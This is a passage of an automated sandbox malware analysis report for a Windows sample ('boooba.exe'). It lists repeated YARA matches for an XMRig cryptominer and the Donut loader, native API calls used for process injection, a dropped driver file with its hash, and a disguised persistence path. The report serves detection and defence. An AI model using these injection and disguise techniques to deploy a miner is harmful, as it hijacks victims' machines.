Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: conhost.exe PID: 5348, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

Abnormal high CPU Usage

Source: C:\Windows\System32\nslookup.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\boooba.exe	Code function: 0_2_00401D58 NtAllocateVirtualMemory,	0_2_00401D58
Source: C:\Users\user\Desktop\boooba.exe	Code function: 0_2_00401D18 NtWriteVirtualMemory,	0_2_00401D18
Source: C:\Users\user\Desktop\boooba.exe	Code function: 0_2_004019D8 NtCreateThreadEx,	0_2_004019D8
Source: C:\Users\user\Desktop\boooba.exe	Code function: 0_2_00401D98 NtProtectVirtualMemory,	0_2_00401D98
Source: C:\Users\user\Desktop\boooba.exe	Code function: 0_2_00401C98 NtClose,	0_2_00401C98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 10_2_00401D58 NtAllocateVirtualMemory,	10_2_00401D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 10_2_00401D18 NtWriteVirtualMemory,	10_2_00401D18
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 10_2_004019D8 NtCreateThreadEx,	10_2_004019D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 10_2_00401D98 NtProtectVirtualMemory,	10_2_00401D98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 10_2_00401C98 NtClose,	10_2_00401C98

Creates driver files

Source: C:\Windows\System32\conhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys

Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\conhost.exe	Code function: 1_2_000001575946E106	1_2_000001575946E106
Source: C:\Windows\System32\conhost.exe	Code function: 1_2_000001575946E4D6	1_2_000001575946E4D6
Source: C:\Windows\System32\conhost.exe	Code function: 1_2_000001575946E90E	1_2_000001575946E90E
Source: C:\Windows\System32\conhost.exe	Code function: 1_2_000001575946D4D2	1_2_000001575946D4D2
Source: C:\Windows\System32\conhost.exe	Code function: 1_2_000001575946ED6A	1_2_000001575946ED6A
Source: C:\Windows\System32\conhost.exe	Code function: 1_2_00007FFD9B8A5106	1_2_00007FFD9B8A5106
Source: C:\Windows\System32\conhost.exe	Code function: 1_2_00007FFD9B8A5EB2	1_2_00007FFD9B8A5EB2
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00000299653048D6	14_2_00000299653048D6
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_0000029965304506	14_2_0000029965304506
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_000002996530516A	14_2_000002996530516A
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_0000029965304D0E	14_2_0000029965304D0E
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00000299653038D2	14_2_00000299653038D2
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00007FFD9BAA4F52	14_2_00007FFD9BAA4F52
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00007FFD9BAA41A6	14_2_00007FFD9BAA41A6

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Yara signature match

Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
